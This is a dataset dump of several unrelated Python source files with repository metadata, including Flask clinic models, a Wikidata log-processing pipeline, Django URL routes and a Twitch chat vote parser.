| 46.52795 | 111 | 0.742357 | 1,421 | 7,491 | 3.659395 | 0.082336 | 0.061538 | 0.046154 | 0.041538 | 0.789231 | 0.753462 | 0.671538 | 0.662692 | 0.490577 | 0.422692 | 0 | 0.061402 | 0.065145 | 7,491 | 160 | 112 | 46.81875 | 0.681137 | 0.021893 | 0 | 0.285714 | 0 | 0 | 0.243195 | 0.058815 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.028571 | 0 | 0.028571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2ab276f6ec20b0fb998feea7021ff85c9eeb034 | 267 | py | Python | geosolver/utils/run_utils.py | mhrmm/geosolver | 13ae2972c58d5ba4c4878576f9fba8569cc99629 | [
"Apache-2.0"
] | 83 | 2015-09-14T13:50:42.000Z | 2022-03-12T10:24:38.000Z | geosolver/utils/run_utils.py | nehamjadhav/geosolver | 13ae2972c58d5ba4c4878576f9fba8569cc99629 | [
"Apache-2.0"
] | 8 | 2021-07-21T09:55:42.000Z | 2022-02-15T02:31:47.000Z | geosolver/utils/run_utils.py | nehamjadhav/geosolver | 13ae2972c58d5ba4c4878576f9fba8569cc99629 | [
"Apache-2.0"
] | 33 | 2015-06-16T18:52:43.000Z | 2021-12-16T08:58:27.000Z | from geosolver.utils.prep import sentence_to_words_statements_values
__author__ = 'minjoon'
def test_prep():
    """Smoke-test the sentence preprocessor on a sample containing LaTeX math."""
    sample = r"If \sqrt{x+5}=40.5, what is x+5?"
    result = sentence_to_words_statements_values(sample)
    print(result)


if __name__ == "__main__":
    test_prep()
| 20.538462 | 68 | 0.737828 | 39 | 267 | 4.487179 | 0.666667 | 0.114286 | 0.171429 | 0.285714 | 0.354286 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02193 | 0.146067 | 267 | 12 | 69 | 22.25 | 0.745614 | 0 | 0 | 0 | 0 | 0 | 0.17603 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.285714 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2acfa3f100f471cb018a58688403a1ea15d30e0 | 620 | py | Python | server/run.py | henri-hulski/morepath_cerebral_todomvc | 568ac277c1844c4cf28bbacf484940f779fc7407 | [
"BSD-3-Clause"
] | 3 | 2016-08-20T06:02:01.000Z | 2019-06-23T09:17:42.000Z | server/run.py | henri-hulski/morepath_cerebral_todomvc | 568ac277c1844c4cf28bbacf484940f779fc7407 | [
"BSD-3-Clause"
] | 6 | 2016-07-30T12:42:29.000Z | 2021-04-18T14:33:40.000Z | server/run.py | henri-hulski/morepath_cerebral_todomvc | 568ac277c1844c4cf28bbacf484940f779fc7407 | [
"BSD-3-Clause"
] | 2 | 2020-09-10T08:07:13.000Z | 2020-09-30T21:15:49.000Z | import morepath
import webob
from webob.static import DirectoryApp, FileApp
from .app import App
def run():  # pragma: no cover
    """Assemble the WSGI stack and serve it with morepath.

    Requests are routed on their first path segment: ``api`` goes to the
    morepath application, ``static`` to the static file directory, and
    everything else to the single-page-app index file.
    """
    morepath.autoscan()
    index_app = FileApp("static/index.html")
    static_app = DirectoryApp("static")
    api_app = App()

    @webob.dec.wsgify
    def dispatch(request):
        # path_info_pop() consumes the leading segment, so the delegated
        # application sees the remainder of the path.
        segment = request.path_info_pop()
        if segment == "api":
            target = api_app
        elif segment == "static":
            target = static_app
        else:
            target = index_app
        return request.get_response(target)

    morepath.run(dispatch)
| 24.8 | 47 | 0.658065 | 73 | 620 | 5.438356 | 0.438356 | 0.098237 | 0.120907 | 0.18136 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.246774 | 620 | 24 | 48 | 25.833333 | 0.850107 | 0.025806 | 0 | 0 | 0 | 0 | 0.053156 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.210526 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2b310f9a9e968bfd962741bff36ead21f4ffc0f | 8,629 | py | Python | backend/flask/apiks_flask_API.py | yasenn/apiks | a5c780d9747a57ab3991b869fcb8cee74b658d99 | [
"MIT"
] | null | null | null | backend/flask/apiks_flask_API.py | yasenn/apiks | a5c780d9747a57ab3991b869fcb8cee74b658d99 | [
"MIT"
] | null | null | null | backend/flask/apiks_flask_API.py | yasenn/apiks | a5c780d9747a57ab3991b869fcb8cee74b658d99 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from settings import *
import json
from api import api
db = SQLAlchemy(app)
class Session_list(db.Model):
    """One clinic visit: links a client, clinic, doctor, visit date and price entry."""
    __tablename__ = 'Session_list'  # creating a table name
    id = db.Column(db.Integer, primary_key=True)  # this is the primary key
    client_id = db.Column(db.Integer, nullable=False)
    # nullable is false so the column can't be empty
    clinic_id = db.Column(db.Integer, nullable=False)
    doctor_id = db.Column(db.Integer, nullable=False)
    # BUG FIX: SQLAlchemy has no `db.date_time_obj` attribute — referencing it
    # raised AttributeError at import time.  `db.DateTime` is the correct
    # timestamp column type.
    date_of_visit = db.Column(db.DateTime, nullable=False)
    price_list_id = db.Column(db.Integer, nullable=False)
# You may decorate your operation with @swagger.operation
# NOTE(review): this second `class Session_list` redefines and shadows the
# model of the same name declared just above — only this definition survives
# at import time, and it declares no columns.  The two should be merged.
# `swagger` and `ModelClass` are not defined anywhere in this module
# (presumably a flask-restful swagger integration is intended — TODO confirm).
class Session_list(db.Model):
    """Serializer/metadata holder for the session-list endpoint."""
    @swagger.operation(
        notes='Get list of sessions',
        responseClass=ModelClass.__name__,
        nickname='session_list',
        parameters=[ ],
        responseMessages=[
            {
              "code": 200,
              "message": "List of sessions"
            },
            {
              "code": 405,
              "message": "Invalid input"
            },
            {
              "code": 503,
              "message": "Server error"
            }
        ]
    )
    def json(self):
        # Serialize the row to a plain dict for JSON responses.
        # NOTE(review): 'client_id' is populated from self.clinic_id — looks
        # like a copy/paste slip; verify against the column definitions above.
        return {'id': self.id, 'client_id': self.clinic_id,
                'clinic_id': self.clinic_id, 'doctor_id': self.doctor_id, 'date_of_visit': self.date_of_visit, 'price_list_id': self.price_list_id}
def add_session_list(_client_id, _clinic_id, _doctor_id, _date_of_visit, _price_list_id):
    """Create a Session_list row from the given ids/date and commit it.

    BUG FIX: the original instantiated lowercase `session_list`, a name that
    does not exist (the model class is `Session_list`), so every call raised
    NameError.  The old docstring also still talked about movies — this module
    appears to be adapted from a movie-API tutorial.
    """
    new_session_list = Session_list(client_id=_client_id, clinic_id=_clinic_id,
                                    doctor_id=_doctor_id, date_of_visit=_date_of_visit,
                                    price_list_id=_price_list_id)
    db.session.add(new_session_list)  # stage the new row in the session
    db.session.commit()               # persist changes
class Price_list(db.Model):
    """Price-list entry: a service, its price, and the doctor position it is billed under."""
    __tablename__ = 'Price_list'  # creating a table name
    id = db.Column(db.Integer, primary_key=True)  # this is the primary key
    service = db.Column(db.String(30), nullable=False)
    # nullable is false so the column can't be empty
    price = db.Column(db.Integer, nullable=False)
    doctor_position_id = db.Column(db.Integer, nullable=False)

    # BUG FIX: a decorator may only precede a `def` or `class` statement.  In
    # the original, @swagger.operation(...) sat directly in front of the
    # `__tablename__` assignment, which is a SyntaxError; it now decorates the
    # serializer below.  NOTE(review): `swagger` and `ModelClass` are not
    # defined in this module — confirm the intended swagger integration.
    @swagger.operation(
        notes='Get price list ',
        responseClass=ModelClass.__name__,
        nickname='session_list',
        parameters=[ ],
        responseMessages=[
            {
              "code": 200,
              "message": "Price List "
            },
            {
              "code": 405,
              "message": "Invalid input"
            },
            {
              "code": 503,
              "message": "Server error"
            }
        ]
    )
    def json(self):
        """Return the row as a plain dict for JSON serialization."""
        return {'id': self.id, 'service': self.service,
                'price': self.price, 'doctor_position_id': self.doctor_position_id}
class Pet_medical_card(db.Model):
    """Medical-card entry recording a doctor's note for a pet on a visit date."""
    __tablename__ = 'Pet_medical_card'  # creating a table name
    id = db.Column(db.Integer, primary_key=True)  # this is the primary key
    doctor_id = db.Column(db.Integer, nullable=False)
    # nullable is false so the column can't be empty
    pet_id = db.Column(db.Integer, nullable=False)
    info = db.Column(db.String(1000), nullable=False)
    # BUG FIX: SQLAlchemy has no `db.date_time_obj`; `db.DateTime` is the
    # correct timestamp column type.
    date_of_visit = db.Column(db.DateTime, nullable=False)

    # BUG FIX: the decorator previously preceded the `__tablename__`
    # assignment — a decorator may only precede a `def`/`class`, so that was a
    # SyntaxError; it now decorates the serializer.  NOTE(review): the notes /
    # messages below still say "sessions" (copy/paste from Session_list);
    # swagger metadata strings left untouched pending confirmation.
    @swagger.operation(
        notes='Get list of sessions',
        responseClass=ModelClass.__name__,
        nickname='session_list',
        parameters=[ ],
        responseMessages=[
            {
              "code": 200,
              "message": "List of sessions"
            },
            {
              "code": 405,
              "message": "Invalid input"
            },
            {
              "code": 503,
              "message": "Server error"
            }
        ]
    )
    def json(self):
        """Return the row as a plain dict for JSON serialization."""
        return {'id': self.id, 'doctor_id': self.doctor_id,
                'pet_id': self.pet_id, 'info': self.info, 'date_of_visit': self.date_of_visit}
class Doctor(db.Model):
    """A doctor employed at a clinic, with position, contact and room details."""
    __tablename__ = 'doctor'  # explicit table name

    id = db.Column(db.Integer, primary_key=True)         # surrogate primary key
    name = db.Column(db.String(30), nullable=False)      # required: may not be empty
    doctor_position_id = db.Column(db.Integer, nullable=False)
    phone = db.Column(db.String(13), nullable=False)
    clinic_id = db.Column(db.Integer, nullable=False)
    cabinet = db.Column(db.Integer, nullable=False)

    def json(self):
        """Return the row as a plain dict for JSON serialization."""
        keys = ('id', 'name', 'doctor_position_id', 'phone', 'clinic_id', 'cabinet')
        return {key: getattr(self, key) for key in keys}
class Clinic(db.Model):
    """A clinic location with its opening schedule and phone number."""
    __tablename__ = 'clinic'  # explicit table name

    id = db.Column(db.Integer, primary_key=True)          # surrogate primary key
    address = db.Column(db.String(50), nullable=False)    # required: may not be empty
    schedule_clinic = db.Column(db.String(20), nullable=False)
    phone = db.Column(db.String(20), nullable=False)

    def json(self):
        """Return the row as a plain dict for JSON serialization."""
        keys = ('id', 'address', 'schedule_clinic', 'phone')
        return {key: getattr(self, key) for key in keys}
class Doctor_position(db.Model):
    """Lookup table of doctor job positions/titles."""
    __tablename__ = 'doctor_position'  # explicit table name

    id = db.Column(db.Integer, primary_key=True)         # surrogate primary key
    position = db.Column(db.String(20), nullable=False)  # required: may not be empty

    def json(self):
        """Return the row as a plain dict for JSON serialization."""
        return {key: getattr(self, key) for key in ('id', 'position')}
class Pet(db.Model):
    """A pet belonging to a client, with its species reference and age."""
    __tablename__ = 'pet'  # explicit table name

    id = db.Column(db.Integer, primary_key=True)        # surrogate primary key
    pet_type_id = db.Column(db.Integer, nullable=False) # required: may not be empty
    name = db.Column(db.String(30), nullable=False)
    client_id = db.Column(db.Integer, nullable=False)
    age = db.Column(db.Integer, nullable=False)

    def json(self):
        """Return the row as a plain dict for JSON serialization."""
        keys = ('id', 'pet_type_id', 'name', 'client_id', 'age')
        return {key: getattr(self, key) for key in keys}
def add_pet(_pet_type_id, _name, _client_id, _age):
    """Create a Pet row from the given attributes and commit it.

    BUG FIX: the original instantiated `Movie` (copy/paste from the movie-API
    tutorial this module is adapted from); the model being stored is `Pet`.
    """
    # creating an instance of our Pet constructor
    new_pet = Pet(pet_type_id=_pet_type_id, name=_name, client_id=_client_id, age=_age)
    db.session.add(new_pet)  # add new pet to database session
    db.session.commit()      # commit changes to session
def get_all_pets():
    """Return every pet in the database as a list of JSON-ready dicts.

    BUG FIX: the original evaluated `pet.query.all()` and `pet.json(pet)` on
    the undefined lowercase name `pet`; queries go through the `Pet` model and
    `json()` is a bound instance method.
    """
    return [p.json() for p in Pet.query.all()]
def get_pet(_name):
    """Return the first pet named *_name* as a single-element list of dicts.

    BUG FIX: the original queried through the undefined lowercase name `pet`
    and called `json()` as an unbound function; the query belongs to the `Pet`
    model and `json()` is a bound method.

    NOTE(review): if no pet matches, `.first()` returns None and `.json()`
    raises AttributeError — confirm whether callers expect an empty list here.
    """
    # filter_by narrows the query by name; since names may repeat we take the
    # first match only.
    return [Pet.query.filter_by(name=_name).first().json()]
class Client(db.Model):
    """A client (pet owner) account with contact details and a role reference."""
    __tablename__ = 'client'  # creating a table name
    id = db.Column(db.Integer, primary_key=True)  # this is the primary key
    name = db.Column(db.String(30), nullable=False)
    # nullable is false so the column can't be empty
    phone = db.Column(db.String(13), nullable=False)
    email = db.Column(db.String(30), nullable=False)
    user_role_id = db.Column(db.Integer, nullable=False)

    def json(self):
        """Return the row as a plain dict for JSON serialization.

        BUG FIX: the original returned {'user_role': self.user_role}, but the
        model defines no `user_role` attribute — only `user_role_id` — so
        serialization raised AttributeError on every call.
        """
        return {'id': self.id, 'name': self.name,
                'phone': self.phone, 'email': self.email, 'user_role_id': self.user_role_id}
class User_role(db.Model):
    """Lookup table of user roles."""
    __tablename__ = 'user_role'  # explicit table name

    id = db.Column(db.Integer, primary_key=True)     # surrogate primary key
    role = db.Column(db.String(15), nullable=False)  # required: may not be empty

    def json(self):
        """Return the row as a plain dict for JSON serialization."""
        return {key: getattr(self, key) for key in ('id', 'role')}
class Pet_type(db.Model):
    """Lookup table of pet species/types."""
    __tablename__ = 'pet_type'  # explicit table name

    id = db.Column(db.Integer, primary_key=True)     # surrogate primary key
    # column named `type` (shadows the builtin inside this class body only)
    type = db.Column(db.String(30), nullable=False)  # required: may not be empty

    def json(self):
        """Return the row as a plain dict for JSON serialization."""
        return {key: getattr(self, key) for key in ('id', 'type')}
| 39.222727 | 165 | 0.6302 | 1,171 | 8,629 | 4.453459 | 0.118702 | 0.062895 | 0.078619 | 0.081496 | 0.704698 | 0.679962 | 0.655417 | 0.58907 | 0.539597 | 0.516012 | 0 | 0.009027 | 0.255418 | 8,629 | 219 | 166 | 39.401826 | 0.802646 | 0.166995 | 0 | 0.458333 | 0 | 0 | 0.104465 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.017857 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2b3a4f96b0e5c0cc51f531b031322f6a5514c13 | 260 | py | Python | examples.py | ramazanpolat/bittrex | 0667fd671a01f7769a36fb712000dcb064af074e | [
"MIT"
] | 1 | 2019-09-24T05:28:34.000Z | 2019-09-24T05:28:34.000Z | examples.py | ramazanpolat/bittrex | 0667fd671a01f7769a36fb712000dcb064af074e | [
"MIT"
] | null | null | null | examples.py | ramazanpolat/bittrex | 0667fd671a01f7769a36fb712000dcb064af074e | [
"MIT"
] | null | null | null | from bittrex import Bittrex
b = Bittrex(apikey='<YOUR_APIKEY>', secret='<YOUR_SECRET', understood='understood')
err, balances = b.get_balances_dict()
if not err:
for coin, balance_info in balances.items():
print(f'Coin:{coin} - {balance_info}')
| 26 | 83 | 0.703846 | 36 | 260 | 4.916667 | 0.611111 | 0.124294 | 0.169492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 260 | 9 | 84 | 28.888889 | 0.800905 | 0 | 0 | 0 | 0 | 0 | 0.242308 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2cc3151348ddad3c0f9db09fa2c0d1acd52a95b | 7,379 | py | Python | tools/QueryAnalysis.py | Wikidata/QueryAnalysis | 2ae7b6226a3ce6a7ebccd3deff0ddd9460d4aa57 | [
"Apache-2.0"
] | 11 | 2017-02-25T00:01:58.000Z | 2020-08-11T18:44:35.000Z | tools/QueryAnalysis.py | Wikidata/QueryAnalysis | 2ae7b6226a3ce6a7ebccd3deff0ddd9460d4aa57 | [
"Apache-2.0"
] | 1 | 2016-10-20T16:01:57.000Z | 2016-10-21T11:30:40.000Z | tools/QueryAnalysis.py | Wikidata/QueryAnalysis | 2ae7b6226a3ce6a7ebccd3deff0ddd9460d4aa57 | [
"Apache-2.0"
] | null | null | null | import argparse
import calendar
from datetime import datetime
import glob
import os
import shutil
import subprocess
import sys
import gzip
import unifyQueryTypes
from utility import utility
import config
os.nice(19)  # run at the lowest CPU priority so this batch job doesn't starve the host

# Month name -> [month number, number of days]; February is bumped to 29
# further below for leap years.
months = {'january': [1, 31],
          'february': [2, 28],
          'march': [3, 31],
          'april': [4, 30],
          'may': [5, 31],
          'june': [6, 30],
          'july': [7, 31],
          'august': [8, 31],
          'september': [9, 30],
          'october': [10, 31],
          'november': [11, 30],
          'december': [12, 31]}

parser = argparse.ArgumentParser("This script extracts the raw log data (if "
                                 + "it was not already done), processes them"
                                 + " using the java application and unifies "
                                 + "the query types.")
parser.add_argument("--ignoreLock", "-i", help="Ignore locked file and "
                    + "execute anyways", action="store_true")
# NOTE(review): the default is 6 but the help text says 7 — confirm which is intended.
parser.add_argument("--threads", "-t", default=6, type=int, help="The number "
                    + "of threads to run the java program with (default 7).")
parser.add_argument("--logging", "-l", help="Enables file logging.",
                    action="store_true")
parser.add_argument("--noBotMetrics", "-b", help="Disables metric calculation"
                    + " for bot queries.", action="store_true")
parser.add_argument("--noDynamicQueryTypes", "-d", help="Disables dynamic "
                    + "generation of query types.", action="store_true")
parser.add_argument("--noGzipOutput", "-g", help="Disables gzipping of the "
                    + "output files.", action="store_true")
parser.add_argument("--noExampleQueriesOutput", "-e", help="Disables the "
                    + "matching of example queries.", action="store_true")
parser.add_argument("--withUniqueQueryDetection", "-u", help="Enable unique query detection", action="store_true")
parser.add_argument("--dbLocation", "-p", type = str, default = config.dbLocation, help = "The path of the uniqueQueriesMapDb file.")
parser.add_argument("--queryTypeMapLocation", "-q", type = str, default = config.queryTypeMapDbLocation, help = "The path of the query type map db file. Default is in the working directory.")
parser.add_argument("--monthsFolder", "-m", default=config.monthsFolder,
                    type=str,
                    help="The folder in which the months directory are "
                    + "residing.")
parser.add_argument("--year", "-y", default=datetime.now().year, type=int,
                    help="The year to be processed (default current year).")
parser.add_argument("months", type=str, help="The months to be processed")

# These are the field we extract from wmf.wdqs_extract that form the raw
# log data. They are not configurable via argument because the java program
# does not detect headers and thus depends on this specific order.
fields = ["uri_query", "uri_path", "user_agent", "ts", "agent_type",
          "hour", "http_status"]

# Build the TSV header row from the field list.
header = ""
for field in fields:
    header += field + "\t"
header = header[:-1] + "\n"  # replace the trailing tab with a newline
# NOTE: this script is Python 2 (print statements and xrange below).
# With no arguments, show usage and exit.
if (len(sys.argv[1:]) == 0):
    parser.print_help()
    parser.exit()

args = parser.parse_args()

if calendar.isleap(args.year):
    months['february'][1] = 29

for monthName in args.months.split(","):
    # Refuse to touch a month another process has locked (a "locked" marker
    # file in the month folder) unless -i was given.
    if os.path.isfile(utility.addMissingSlash(args.monthsFolder)
                      + utility.addMissingSlash(monthName) + "locked") \
            and not args.ignoreLock:
        print "ERROR: The month " + monthName + " is being edited at the " \
            + "moment. Use -i if you want to force the execution of this script."
        sys.exit()

    month = utility.addMissingSlash(os.path.abspath(utility.addMissingSlash(args.monthsFolder)
                                                    + utility.addMissingSlash(monthName)))

    processedLogDataDirectory = month + "processedLogData/"
    rawLogDataDirectory = month + "rawLogData/"
    tempDirectory = rawLogDataDirectory + "temp/"

    # If the month directory does not exist it is being created along with
    # the directories for raw and processed log data.
    if not os.path.exists(month):
        print("Starting data extraction from wmf.wdqs_extract for "
              + monthName + ".")

        os.makedirs(month)
        os.makedirs(processedLogDataDirectory)
        os.makedirs(rawLogDataDirectory)

        # For each day we send a command to hive that extracts all entries for
        # this day (in the given month and year) and writes them to temporary
        # files.
        for day in xrange(1, months[monthName][1] + 1):
            arguments = ['hive', '-e']
            os.makedirs(tempDirectory)
            hive_call = 'insert overwrite local directory \'' + tempDirectory \
                        + '\' row format delimited fields terminated ' \
                        + 'by \'\\t\' select '

            # We add all the fields to the request
            for field in fields:
                hive_call += field + ", "
            hive_call = hive_call[:-2] + " "

            hive_call += ' from wmf.wdqs_extract where uri_query<>"" ' \
                         + 'and year=\'' + str(args.year) + '\' and month=\'' \
                         + str(months[monthName][0]) + '\' and day=\'' + str(day) + '\''
            arguments.append(hive_call)

            if subprocess.call(arguments) != 0:
                print("ERROR: Raw data for month " + monthName + " does not "
                      + "exist but could not be extracted using hive.")
                sys.exit(1)

            # The content of the temporary files is then copied to the actual
            # raw log data file (with added headers)
            with gzip.open(rawLogDataDirectory + "QueryCnt"
                           + "%02d"%day + ".tsv.gz", "wb") as dayfile:
                dayfile.write(header)
                for filename in glob.glob(tempDirectory + '*'):
                    with open(filename) as temp:
                        for line in temp:
                            dayfile.write(line)
            # Remove the temp dir so the next day's makedirs() succeeds.
            shutil.rmtree(tempDirectory)

    # We build the call to execute the java application with the location of
    # the files, the number of threads to use and any optional arguments needed
    mavenCall = ['mvn', 'exec:java@QueryAnalysis']
    mavenArguments = '-Dexec.args=-w ' + month + ' -t ' + str(args.threads) + ' -p ' + args.dbLocation + " -q " + args.queryTypeMapLocation

    # Translate the optional CLI switches into flags for the java program.
    if args.logging:
        mavenArguments += " -l"
    if args.noBotMetrics:
        mavenArguments += " -b"
    if args.noDynamicQueryTypes:
        mavenArguments += " -d"
    if args.noGzipOutput:
        mavenArguments += " -g"
    if args.noExampleQueriesOutput:
        mavenArguments += " -e"
    if args.withUniqueQueryDetection:
        mavenArguments += " -u"

    mavenCall.append(mavenArguments)

    # Maven must run from the project root one level up; restore the cwd after.
    owd = os.getcwd()
    os.chdir("..")

    print "Starting data processing using QueryAnalysis for " + monthName + "."

    if subprocess.call(['mvn', 'clean', 'package']) != 0:
        print "ERROR: Could not package the java application."
        sys.exit(1)

    if subprocess.call(mavenCall) != 0:
        print("ERROR: Could not execute the java application. Check the logs "
              + "for details or rerun this script with -l to generate logs.")
        sys.exit(1)

    os.chdir(owd)
c2d6007285ad5baf17afd7f3508cd8c9cfc4ca53 | 395 | py | Python | setup.py | mindis/timeseries2redis | 346eef859e59f8d55f4aeb817a3498376733ac36 | [
"MIT"
] | 2 | 2017-10-29T12:00:11.000Z | 2019-03-12T15:09:09.000Z | setup.py | mindis/timeseries2redis | 346eef859e59f8d55f4aeb817a3498376733ac36 | [
"MIT"
] | null | null | null | setup.py | mindis/timeseries2redis | 346eef859e59f8d55f4aeb817a3498376733ac36 | [
"MIT"
] | 2 | 2019-03-12T15:09:13.000Z | 2019-10-30T18:28:43.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
VERSION = '0.1'
#
import sys
import os
from setuptools import setup, find_packages
from setuptools.extension import Extension
setup(name='timeseries2redis',
version=VERSION,
description='timeseries2redis',
author='trbck',
packages=find_packages(),
package_data={'timeseries2redis': ['timeseries2redis.py']},
)
| 20.789474 | 65 | 0.686076 | 42 | 395 | 6.380952 | 0.642857 | 0.104478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021605 | 0.179747 | 395 | 18 | 66 | 21.944444 | 0.805556 | 0.106329 | 0 | 0 | 0 | 0 | 0.214286 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c2dd0edce0a1e833af3074a49d8d489a149cfe83 | 1,381 | py | Python | src/mealspot/urls.py | OrenBen-Meir/Meal-Spot | 0b4d331f1094dda0487be2f04b08cb12e20fa1ae | [
"MIT"
] | null | null | null | src/mealspot/urls.py | OrenBen-Meir/Meal-Spot | 0b4d331f1094dda0487be2f04b08cb12e20fa1ae | [
"MIT"
] | 5 | 2019-11-01T16:23:27.000Z | 2021-06-10T19:12:25.000Z | src/mealspot/urls.py | OrenBen-Meir/Meal-Spot | 0b4d331f1094dda0487be2f04b08cb12e20fa1ae | [
"MIT"
] | null | null | null | """mealspot URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf import settings
from django.urls import include, path
from django.views.generic import RedirectView
from django.conf.urls.static import static
# URL routing: each feature app owns its own prefix; the bare root redirects
# to /home, and 'accounts/' wires up Django's built-in auth views.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('customer/', include('customer.urls')),
    path('cook/', include('cook.urls')),
    path('deliverer/', include('deliverer.urls')),
    path('home/', include('home.urls')),
    path('manager/', include('manager.urls')),
    path('salesperson/', include('salesperson.urls')),
    path('', RedirectView.as_view(url='home/', permanent=True)), # '/' redirects to /home
    path('accounts/', include('django.contrib.auth.urls')),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)  # serve static files
| 41.848485 | 89 | 0.704562 | 190 | 1,381 | 5.084211 | 0.352632 | 0.057971 | 0.015528 | 0.024845 | 0.1853 | 0.1853 | 0.07764 | 0 | 0 | 0 | 0 | 0.006774 | 0.144823 | 1,381 | 32 | 90 | 43.15625 | 0.811177 | 0.469225 | 0 | 0 | 0 | 0 | 0.22865 | 0.033058 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.3125 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c2e1d261b6a1d00a086bc3055c588a8dbc743bea | 4,220 | py | Python | webapp/parse_vod_info.py | sesic/stockstream.live | eb58e8522d30e75350236c614fa2584fccc04173 | [
"MIT"
] | 6 | 2018-02-23T16:16:12.000Z | 2020-12-27T18:00:31.000Z | webapp/parse_vod_info.py | sesic/stockstream.live | eb58e8522d30e75350236c614fa2584fccc04173 | [
"MIT"
] | 4 | 2017-09-21T14:31:27.000Z | 2017-10-26T23:11:34.000Z | webapp/parse_vod_info.py | sesic/stockstream.live | eb58e8522d30e75350236c614fa2584fccc04173 | [
"MIT"
] | 3 | 2020-09-14T23:28:25.000Z | 2021-07-27T18:16:03.000Z | import sys
import json
import datetime
import stockstream
import os
# NOTE: Python 2 script (print statements).  Loads Twitch "rechat" JSON dumps,
# extracts !buy/!sell chat votes, fetches the matching day's orders from the
# stockstream API, and matches each filled order to the votes that caused it.
records = []
i = 0
files = os.listdir("rechat")
for f in files:
    # (disabled debug block kept as-is: skip the first 3 files)
    """if i < 3:
        i += 1
        continue"""
    records += json.loads(open("rechat/" + f).read())
    print "Loaded {} now have {} records.".format(f, len(records))
    i += 1
    if i > 10:
        pass#break  # NOTE(review): truncation guard disabled — all files are loaded

# date string ("MM-DD-YYYY") -> list of vote dicts parsed from chat.
date_to_votes = {}
for record in records:
    if 'attributes' not in record:
        continue
    timestamp = record['attributes']['timestamp']
    from_user = record['attributes']['from']
    message = record['attributes']['message'].encode('utf-8').lstrip().rstrip()
    # Only "!buy SYM" / "!sell SYM" chat commands count as votes.
    if not message.startswith("!buy ") and not message.startswith("!sell "):
        continue
    fields = message.split(" ")
    if len(fields) != 2:
        continue
    action = fields[0][1:].upper()     # BUY / SELL (strip the leading '!')
    parameter = fields[1].upper()      # ticker symbol
    # timestamps are in milliseconds since the epoch
    time_str = datetime.datetime.fromtimestamp(timestamp / 1000).strftime('%m-%d-%Y %H:%M:%S')
    date_str = datetime.datetime.fromtimestamp(timestamp / 1000).strftime('%m-%d-%Y')
    # print "{} {}: {}".format(time_str, from_user, message)
    if date_str not in date_to_votes:
        date_to_votes[date_str] = []
    date_to_votes[date_str].append({
        "username": "twitch:" + from_user,
        "action": action,
        "parameter": parameter,
        "timestamp": timestamp
    })

#print "{} entries in date_to_votes.".format(len(date_to_votes))

# date -> orders+votes merged and sorted by timestamp; also index orders by id.
date_to_objects = {}
total_orders = 0
order_id_to_order = {}
